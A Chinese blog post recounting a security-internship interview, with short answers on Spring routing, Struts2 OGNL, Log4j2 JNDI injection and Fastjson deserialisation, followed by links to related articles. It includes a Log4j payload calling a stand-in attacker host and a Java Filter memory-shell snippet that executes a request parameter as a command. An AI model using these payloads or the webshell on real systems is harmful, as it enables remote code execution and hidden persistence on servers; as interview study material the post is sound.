长亭实习生一面。。。

最新推荐文章于 2025-04-03 15:22:29 发布
最新推荐文章于 2025-04-03 15:22:29 发布
阅读量1k 收藏 19
点赞数 29
文章标签: web安全 渗透测试 网络安全 代码审计 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/persist213/article/details/146452698
版权

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

1 Spring Boot 路由表示方式

答案
通过注解直接定义,如:

@GetMapping("/user/{id}")  
public User getUser(@PathVariable String id) { ... }  

2 其他路由表示方式

答案

  • 实现 WebMvcConfigurer 接口,重写 addViewControllers()

  • 旧版 Spring 使用 @RequestMappingmethod 属性(如 method = RequestMethod.GET)。

3 路由注解统称

答案
统称为 请求映射注解(Request Mapping Annotations)。

4 Mybatis 映射文件存放位置

答案
默认在 src/main/resources/mapper/ 目录下,或通过 @MapperScan 指定包路径。

5 Struts2 相关经验

答案
Struts2 漏洞多由 OGNL 表达式注入引起(如 S2-045)。需熟悉漏洞原理及 Payload 构造(如 %{#_memberAccess=...})。

6. Python 爬虫跳过 SSL 证书验证

答案
使用 requests 库时设置 verify=False,并禁用警告:

import requests  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
response = requests.get("https://example.com", verify=False)  

7. Log4j2 漏洞利用函数

答案
关键函数为 lookup(),通过 jndi: 协议触发 JNDI 注入。攻击 Payload:

${jndi:ldap://attacker.com/Exploit}  

8. JNDI 注入配合的协议

答案

  • RMI:动态加载远程类。

  • LDAP:指向恶意服务器返回 Exploit 代码。

  • DNS:用于信息泄露或探测漏洞存在性。

  • IIOP(CORBA):较少见,但可结合利用。

9. 通过 Fastjson 注入内存马

答案
步骤

  1. 利用 Fastjson 反序列化漏洞:构造恶意 JSON,触发 JNDI 注入。

  2. 加载内存马代码:远程类实现 ServletContainerInitializer,在 onStartup() 中注册 Filter。

  3. Filter 内存马示例
    public class EvilFilter implements Filter {  
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) {  
        // 执行任意命令  
        Runtime.getRuntime().exec(req.getParameter("cmd"));  
    }  
}  

  4. 持久化:通过反射将 Filter 添加到 FilterChain,无需写入文件系统。

go_to_hacker
关注
深信服安服实习生面试心得
jia3643的博客
03-13 1万+
二月中旬申请了深信服的安服实习生,今天下午刚刚完成三面,从投简历到三面完成花了差不多三个星期,总的来讲感觉实习生面试不是很难,但是也有一些自己薄弱答不上来的地方,想记录一下其中的经历和收获。 0x00概述 一面 :技术面, 二面:技术面+一些个人问题 三面:hr面 因为第一次面试没有经验,结果两次技术面都忘记录音了,哈哈,可能记得不是很全,emmmm,尽量我多记起来一点 OWASP TOP10是...
2023年湖南理工学院程序设计竞赛新生赛 解题报告(简化版) | 珂学家 | 思维场
每天多一点干货
12-09 1067
1、海康威视,测试,base杭州,慧影,工作时间早八点多到晚九点多,貌似是大小周,14k×142、苏小研,测试,base苏州,工作时长未知,据hr说18w+6~弹性工作制 不打卡上班!#华为# #腾讯# #阿里# #华为求职进展汇总# #华为保温# #晒一晒我的offer# #华子oc时间线# #华为开奖那些事# 告诉了我的薪资。
春招长亭实习生一面。。。
jxiang213的博客
03-23 801
网安面试指南》5000篇网安资料库。
长亭科技 Go 后端开发实习生一面面经
weixin_45651194的博客
01-10 1114
长亭科技 Go 开发实习生技术一面,时间有点久了,凭回忆记录的。
长亭安全运营实习一面
carrot11223的博客
04-29 629
他说的我真的想去了,但是在北京啊!我心里知道我根本去不了,他说他和我经历很像,本来也想着搞技术的,但是后来转到了一个全方面发展的地方,说他主要负责蜜罐这一块什么什么的,woc,他好中肯,说的真的很多,还好我录下来了。然后问了俩仨个问题,都很基础,将的sql注入,ssrf这些为什么会产生,怎么防御,利用绕过的方式.然后他说他跟hr打个招呼,让我考虑一下后面要怎么发展,看我自己的方向,如果可以再安排二面。跟我讲了一下这个岗位大概是干什么的,看看我的预期是什么?然后我问他我该怎么发展?
长亭实习-两周记录
笑花大王
07-04 2343
除了拒绝就是拒绝 因为疫情都在家呆半年了 总琢磨着在从疫情中获得对于我未来的转机。。。 1.4月份就开始头简历了 通过网站投啊投 最早就想投长亭 通过网站投了两次长亭长亭没理我 hhhhh 2.投了奇安信 好不容易等来笔试 数据接口算法偏多 当时这门课没学好 啊啊啊后悔啊 挂在笔试。。。 3.找之前北京做健身的时候认识的一个大哥 他就是字节跳动的 内推了一把 没要我。。。 4.省...
某大厂安全工程师一面分享
黑战士的博客
01-21 1231
介绍 上周面了某互联网大厂被刷(具体不便透漏) 感觉他们需要真正的大佬,我这种混子怕是没希望进去了,唉 笔者是某211本科,计算机不强势,学校甚至没有一个安全相关的社团,基本全靠自学 面试时间很长,是我经历最长的一次,大概一个半小时,没有算法题,纯粹聊技术 (正常官网投递简历渠道,没有内推,没有特殊要求) ** 面试内容 ** 问:看你做java多一些,讲讲java内存马 答:servlet型,spring的controller和interceptor型,然后具体展开,比如context如何获取,怎样结合反
南京某大厂 渗透测试工程师实习面试分享
人若无名,便可专心练剑
10-23 821
*Webshell是黑客经常使用的一种恶意脚本,常见的webshell编写语言为****asp、jsp和php。
面试经验分享 | 渗透测试工程师(实习岗)
2301_80127209的博客
06-24 1781
Webshell是黑客经常使用的一种**恶意脚本,常见的webshell编写语言为asp、jsp和php。
面试总结-2023届安全面试题总汇
lza20001103的博客
09-16 7342
2023届安全面试题总汇 文章目录2023届安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1753
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
中电金信:2024全球数字经济大会AI赋能 “掘金”数字金融
2301_79125431的博客
07-05 1506
这连续被两个口头offer给爽约了,找麻了,有内推的吗,软测就行,游测也行,啥od不od的都可以,现。东莞嘉*达,裁应届,3月份开始实习,实习期三个月,上个月29号突然说只能留两个,4个后端滚两个,真t。鼠鼠打算就业,最近一直在忙实习的事,老师安排的报互联网也没有耽误,但是鼠鼠老师希望鼠鼠安心报互联网+如题,实习半个多月了,mentor每天忙的飞起,然后根本没时间管我,只有他偶尔几次主动找我时候表现的。我最近做面试执行,主要是协调候选人和面试官的时间,是运营相关的岗位,我的ld让我去把招聘实习生的简历。
系统与网络安全------Windows系统安全(8)
最新发布
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-03 231
DNS(域名系统)是互联网核心服务,通过分层分布式数据库将域名(如)解析为IP地址,实现设备寻址。采用客户端-服务器架构,包含根域名服务器、顶级域(TLD)服务器和权威域名服务器,支持递归/迭代查询。记录类型包括A(IPv4)、AAAA(IPv6)、MX(邮件交换)、CNAME(别名)等。默认使用UDP 53端口,依赖缓存机制提升效率。虽存在DNS劫持、污染等风险,但可通过DNSSEC(数字签名)增强安全性。
202年充电计划——自学手册 网络安全(黑客技术)
2401_85027424的博客
04-02 1116
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全与防护策略
菜鸟的专栏
04-02 953
网络安全(Cybersecurity)是指通过使用技术、管理和法律手段,保护计算机系统、网络、应用程序及数据免受未经授权的访问、使用、披露、破坏、修改或泄露。其主要目标是确保信息的机密性完整性和可用性。机密性(Confidentiality):确保数据只能被授权用户访问,防止数据泄露。完整性(Integrity):保证数据在存储、传输过程中不被篡改。可用性(Availability):确保合法用户可以随时访问和使用信息系统。
精心整理-2024最新网络安全-信息安全全套资料(学习路线、教程笔记、工具软件、面试文档).zip
goodxianping的专栏
03-29 518
5.4-网络安全基础-常见网站攻击方式概述-网站服务器运行缓慢、网络安全基础-被植入了蠕虫病毒.mp4。5.2-网络安全基础-常见网站攻击方式概述-网站的根目录中出现大量的植入网页.mp4。5.7-网络安全基础-常见网站攻击方式概述-网站的数据库被植入内容.mp4。13.4-渗透测试漏洞挖掘、漏洞扫描-渗透测试必备工具(下).mp4。13.3-渗透测试漏洞挖掘、漏洞扫描-渗透测试必备工具(中).mp4。13.2-渗透测试漏洞挖掘、漏洞扫描-渗透测试必备工具(上).mp4。
2025年三个月自学手册 网络安全(黑客技术)
2401_85027336的博客
03-26 2993
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
从入门到精通:SQL注入防御与攻防实战——红队如何突破,蓝队如何应对!
Aishenyanying33的博客
03-26 1289
SQL注入(SQL Injection)是最古老且最常见的Web应用漏洞之一。尽管很多公司和组织都已经采取了WAF、防火墙、数据库隔离等防护措施,但SQL注入依然在许多情况下能够突破防线,成为攻击者渗透内网、窃取敏感信息的重要手段。 本篇文章将深入剖析SQL注入攻击的全过程,详细讲解红队是如何突破现有防线的,并且为蓝队提供实战防御策略。通过真实场景案例,从简单到深入,帮助你一步步理解并掌握SQL注入防御的核心技术。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
03-31 384
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
长亭能投几次实习
03-19
长亭科技是一家专注于网络安全领域的公司,对于实习生职位的投递次数限制通常与公司的招聘政策有关。以下是关于此类问题的一些常见解答: 一般情况下,企业在接收简历时会设定一定的规则以避免重复投递。例如,在特定的时间段内(比如一个月或者三个月),求职者只能针对同一岗位提交一次申请。 如果想再次尝试申请相同类型的实习机会,则需要等待该时间间隔过后再进行新的投递动作。不过具体到长亭科技而言,其官方并未公开明确说明实习生职位是否有严格的投递次数上限规定。因此建议直接查看目标企业的官网招聘信息页面获取最新动态;同时也可以联系人力资源部门询问更准确的信息。 此外还可以采取以下措施提高成功率: 优化个人简历内容突出自身优势特点 适时跟进已发送出去的应聘请求状态 关注企业社交媒体账号及时掌握新发布的职业发展资讯 ```python # 示例代码用于展示如何通过API查询某家公司是否允许多次投递简历的功能实现逻辑伪代码表示如下: import requests def check_resume_submission_limit(company_name): url = f"https://api.jobportal.com/{company_name}/submission_policy" response = requests.get(url) if response.status_code == 200: data = response.json() return data['allow_multiple_submissions'],data['waiting_period'] else : return None,None allowed,period=check_resume_submission_limit("ChangtingTech") if allowed is not None and period is not None: print(f"The company allows {'multiple' if allowed else 'single'} submissions with a waiting period of {period} days.") else: print("Could not retrieve submission policy for the specified company.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值